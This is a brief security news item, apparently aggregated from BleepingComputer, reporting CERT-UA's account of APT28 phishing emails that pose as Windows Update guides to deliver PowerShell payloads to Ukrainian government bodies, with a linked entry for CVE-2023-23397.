Security News > 2023 > April > Hackers use fake ‘Windows Update’ guides to target Ukrainian govt

Hackers use fake ‘Windows Update’ guides to target Ukrainian govt
2023-04-30 14:07

The Computer Emergency Response Team of Ukraine says Russian hackers are targeting various government bodies in the country with malicious emails supposedly containing instructions on how to update Windows as a defense against cyber attacks.

Instead of legitimate instructions on upgrading Windows systems, the malicious emails advise the recipients to run a PowerShell command.

This command downloads a PowerShell script on the computer, simulating a Windows updating process while downloading a second PowerShell payload in the background.

Mocky is a legitimate application that helps users generate custom HTTP responses, which APT28 abused in this case for data exfiltration.

In March 2023, Microsoft patched an Outlook zero-day vulnerability tracked as CVE-2023-23397, which APT28 has exploited since April 2022 to breach the networks of European government, military, energy, and transportation organizations.

Interestingly, Chinese hackers also used Windows updates as a lure to drop malicious executables in attacks against Russian government agencies last year.


News URL

https://www.bleepingcomputer.com/news/security/hackers-use-fake-windows-update-guides-to-target-ukrainian-govt/

Related Vulnerability

DATE CVE VULNERABILITY TITLE RISK
2023-03-14 CVE-2023-23397 Authentication Bypass by Capture-replay vulnerability in Microsoft products
Microsoft Outlook Elevation of Privilege Vulnerability
network
low complexity
microsoft CWE-294
critical
9.8